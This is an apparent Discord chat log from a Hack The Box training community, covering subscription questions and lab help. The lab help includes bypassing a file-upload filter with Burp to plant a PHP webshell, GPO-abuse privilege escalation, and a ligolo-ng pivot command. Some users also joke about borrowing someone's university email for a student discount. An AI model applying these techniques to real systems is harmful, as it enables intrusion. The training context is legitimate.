what is obsidian?

and HTB?

i think you have landed in the wrong place my friend!

how did you end up here @winged atlas

idk i'm into cybersecurity

lol i know it

did you figure out what Obsidian is yet? @winged atlas

nah

i know real obsidian

don't tell me it's a swoftware?

if your looking to learn cybersecurity for free. this isn't the place

fr ?

we all have paid memberships

oh

for academy or the machines

HTB discord is fee tho

but we are all learning on some path

you know both platform have free content right? 🤣

ok thx mate i think i gotta figure that path by myself

yes but thte free stuff isn't as in depth

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

for beginners it's kinda a good thing 😂

i think gonna take cs50 &stanford one

you don't need cs for hacking

it's on you whether or not you want to do it

no they have a free course about it

at this day and age of Fing course cs is free 🤣

bro if it's on me i wouldn't be here

cs is boring but hacking is fun but most of the time hell

also some more resource for y'all #modules message

i don't love cs but it's free and maybe who know the future

here is a good resource this guy send me before #resources-tools message

do you have the paid version, how much is it ?

It's free if you install the Google drive desktop app

I have my notes on Windows

Well now I do lol

lol

learned the hardway! still sad i messed up my kali machine

i downloaded the kali purple its super lightweight storeage was only 26%

started downloaded some penetration test stuff now and only at 50%

thanks man, appreciated!

You can also use git as a shared backend if you dont want a shared drive style setup

I just have my git repo auto commit changes every 20mins and push changes remotely

I'm working on the PHP webshells exercises, and I've successfully uploaded the White Winter Wolf webshell.php file to the target. But when I try to navigate to https://<target IP>/images/vendor.connect.php as described in the module, I get a 404 not found error instead of access to a web shell. I also tried using Laudanum but that didn't work either. Any ideas?

copy and paste the command @leaden pond so we can see if you uploaded the correct sytnax

The url I try to navigate to?

the uploaded php webshell

which module and section are you on?

Module: Shells and Payloads, Section: PHP Webshells

i don't think it's a good idea to send his payloads here specifically via discord 🤣 both admin and discord won't be happy 😂

lol my bad, just trying to help

No worries! Thanks for the help. I also didn't type a command to submit the payload. I uploaded the file through an image upload feature and used Burp to allow me to avoid the "you can't upload that type of file in this field" error.

all good we need more helper (my shift is 24h) 🤣

from your first post tho, i don't see a port specified

oh did you change the content-type to the answer of the first question?

Yes, that's exactly what I did

in repeater?

I just intercepted the request in the proxy, modified that one parameter, hit forward twice until I saw "vendor uploaded to database" in browser, then turned off intercept

the intercept thing doesn't always work for me try in repeater

what can i use instead of the academy built in workstation

if that also doesn't work shoot me a dm with your burp request

your vm + vpn

In Windows Privilege Escalation, SeTakeOwnershipPrivilige has has anyone been able to build SharpGPOAbuse and run it on the target. I've been able to build it but when I try to run it on the target it crashes

which section are you on?

SeTakeOwnershipPrivilege

Alright, I'll try repeater. I don't think that's the issue, since once I modify the request and forward it, I get a confirmation message in the browser that the file was uploaded, and the webpage looks exactly like it does in the tutorial. I get right up to the point where you're supposed to be able to navigate to the url to access the webshell and then get a 404 error.

no idea why i couldn't search for this in my note but the section mentioned the tool once and have nothing about that tool so if a tool isn't intended for section there isn't much help on the troubleshoot part

also did you run it on your vm to confirm that you compile it right? also found a binary online maybe give this a try https://github.com/byronkg/SharpGPOAbuse/tree/main/SharpGPOAbuse-master

my own vm or does hack the box have one?

yes but it isn't free

shit

guess i have to wait till tomorrow cos i accidently closed the workstation

also just notice did you name your payload vendor.connect.php ? because the default name is webshell.php

Oh, that could definitely be the issue. Let me try that!

Hello everyone, do you guys know how to preperly double pivot with ligolo-ng ?

and you are right if you can confirm that the payload has been uploaded then there is no point in using repeater but i just don't trust the intercept

what can i use for free?

did make a quick "section" on that want to give that a quick read and maybe some feedback?

read the pwnbox tos or help help guide

yes but on the academy 2h / day and on the main 2h / life

• have this on kali <-> 172.16.5.15
• using agent.exe -connect 172.16.5.15:10011 -ignore-cert on 172.16.5.35, but getting this error:

@vital adder would love that !!

created with --tcp btw

that look like some verbose bs i get everytime i run nmap or something

weird, seems like nothing is running here

wheres that

Got the web shell! I hadn't named the file properly. Thanks a ton. You really helped me out.

np ❤️

The instructions at the end of the section Question say to leverage SeTakeOwnershipPrivilege rights to get the flag. None of the users on the target have SeTakOwnershipPrivilege.

The module notes say "Suppose we encounter a user with this privilege or assign it to them through an attack such as GPO abuse using SharpGPOAbuse"In the Windows Privilege Escalation course in the module SeTakeOwnershipPrivilege, the instructions say to use SharpGPOAbuse to acquire the privileges necessary to access the directory containing the flag.

However SharpGPOAbuse.exe is not one of the programs included in C:/Tools on the target.

I tried building SharpGPOAbuse.exe myself however when I run it on the target I get the error Unhandled Exception: System.MissingMethodException: Method not found: 'Void System.Threading.Monitor.Enter(System.Object, Boolean ByRef)'.
at SharpGPOAbuse.Program.Main(String[] args).

ah finalyyyy

https://help.hackthebox.com/en/articles/5185608-introduction-to-pwnbox
https://academy.hackthebox.com/faq

i have a problem that im doing the first instance but i ran out of spawns, i have to wait 24hrs to get another or i can do smth

Congrats that's huge. What you gonna do now?

that's a money problem 🤣 jk but you can just use your own vm

Btw question for you. How much HTML and JavaScript should I know before attempting this path?

should i spend my money....? yeah, i will spend it i wanna learn

I’m on Linux module it’s asking the name of the interface that mtu is set to 1500

so for the tool error of the tool part i think that's because of compiling issue and for the user that don't have that privilege part the section show you a script that enable it use that script to add the privilege to the given user first

I’m convinced it’s eth0 but it’s telling me I’m wrong

Left out with few modules for completing CPTS path , will go for it then gonna enroll for oscp

yea thing isn't free but if you want it to be use your own stuff 🤣

I would say that course teaches u the html css and js basic so that u can understand how the things are working, but the ending module required u to have a knowledge about python and php scripting for which i got stuck

Ahh okay. Will you do the CBBH and CPTS exams? Or straight to OSCP?

OSCP --> CPTS --> CBBH (maybe)

Why not CPTS before OSCP? Because I heard that CPTS is harder and so it will prepare you for OSCP

what are cubs for?

are usefull?

if u wanna do the modules yess it is usefull, it is used to unlock the modules

i feel like need more practice for CPTS

nmap

the offshore prolab is the best for that

is he asking for switches?

I would do all the resources on HTB before doing the OSCP. Because you are gonna pay a lot and if you're not ready then it will be a waste of money

Like the CPTS course and exam, and the pro labs, and the OSCP HTB boxes

is silver worth getting?

Include --open to skip closed ports

nmap -T 4 -sV <ip>

You can do all modules up to Tier II with it.
Yes, if you want to do all these modules, this subscription is worth it.

yep thats why going for oscp

with question i like i have no clue 🤣

taking CPTS path as pre-workout for oscp

Also the Pro labs and the HTB boxes that are similar to OSCP will prepare you to the maximum

can i do all tiers with silver?

it's should be the other way around but 1.5K isn't the price for a pre-workout course 🤣

No, only until Tier II

cant i do that free?

lol yeah, i wish CPTS get its deserving recognition faster

yep i have offshore and cybernetics

Tier 0 is free

i have a question about HTB academy. when you start a module, it says that at the end of that, we will get +X buckets (for example +10 buckets) but i didn't get any extra buckets ! is it normal ??

is tier 1 free

no tier 0 is free

I'm a skilled Full-Stack developer with 6+years of experience
I'm passionate about creating visually stunning, user-friendly websites that help my clients stand out digitally.
If you're looking for a talented and experienced developer, look no further than me!

WEBSITE DEVELOPMENT:

-MERN Stack
-Laravel
-PHP
-Vue.js
-HTML/CSS
-Python

not the right place for this

??

okk okk ok ok

and, is there a way to get stuff fore free

yeah.. NO

i would suggest that univeristy domain id is usefull

i'm isn't a dev but that's isn't a whole lot of knowledge for 6+ years 🤣

only if he's a student

How does the Cubes system work?

Cubes are our awesome currency! It might take it a bit to understand how it all works, but here is a summary:

Cubes are used to unlock Modules & Paths.
You get back Cubes as a reward for Module & Paths completion. It is like cash back, but better!
The Cubes needed to unlock and reward back depend on the Tier of the Module. Find a table below for reference.

Module Tiers Unlock With Reward Back
Tier 0 10 10 (Free!)
Tier I 50 10
Tier II 100 20
Tier III 500 100
Tier IV 1,000 200

https://academy.hackthebox.com/faq

||steal someone id||

||UwU||

typo

hi
i didn't understant well !
for example i complete "Introduction to Academy" module
but i didn't get +10 buckets as reward
i just only got my spented 10 buckets at the end of module (cash back)

is it normal ?

whats the point of silver anual id silver monthly is cheaper?

ah green colour look amazing . motivate me to reach pro rank

Yes, that's why the module is free.
You pay 10 cubes and get 10 cubes back.

and
we can learn all of the modules step-by-step with this system
without any extra payment. yes ?

Annual give you all module up to tier 2 and a exam voucher

Only Tier 0 Modules

so just the exam voucher then?

it isn't that hard if you play the seasons a forgot about it (i didn't know i got the rank for like months)

so in the Tier I
if i spent 50 cubes
i will get back just 10 Cubes
not 50+10 cubes
right ?

yes

From Tier I you get 20% of the costs back.

it's bad man !!!
i thought all of the modules is free 😢

Nobody works for free

how many machines ?

i mean how much do you pay for what is on the billing you can just read it and ask here if you have further questions about it

yes i know
but i thought it's free here

no clue like i said didn't know i got the rank

All Tier 0 Modules are free

yes

thanks for answers

it says direct acces to job role paths

whats that

and is there any other way to get them?

nope

both job paths are just a list of module and all of them are <= tier 2

so paying for modules up tier 2 will give you access to both path

also you don't get 3 guy asking for free stuff on the academy every single day 🤣

so silver monthly will get me it ok

silver monthly isn't going to get you modules up tier 2

what does cos none of them says it does except for student and annual

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions

only Student and Silver Annual Subscriptions will get you modules up tier 2 and only Silver Annual will throw in an exam voucher

need someones uni email then fr

cos i dont have 350

yess it will be very helpfull

if you are looking for it here then you won't find any but the 👢

lol

Is anyone starting Penetration Tester Path?

i've done both path need help with something?

wait is it on about american uni or uk uni cos ik it works different

any uni

I need a study group because I cannot seem to focus alone hahah

oh you're back

i thought you got ban

why ?

saw him get yeeted when i was checking my rank

Hi, that script, EnableAllToeknPrivs.ps1, only works if the user already has SeTakeOwnershipPrivilege but it is disabled

PS C:\htb> whoami /priv

PRIVILEGES INFORMATION

Privilege Name Description State
============================= ======================================================= ========
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\htb-student>

On the target the user doesn't have SeTakeOwnershipPrivilege at all.

and a quick search for his old dm here show nothing

gunna borrow someones uni email to use fr need to find someone

not from here stinky

mod and admin can't do anything if you do it IRL but just don't spam here for that

yess maybe saying that can also cause you get into trouble

also the previous tool work fine for me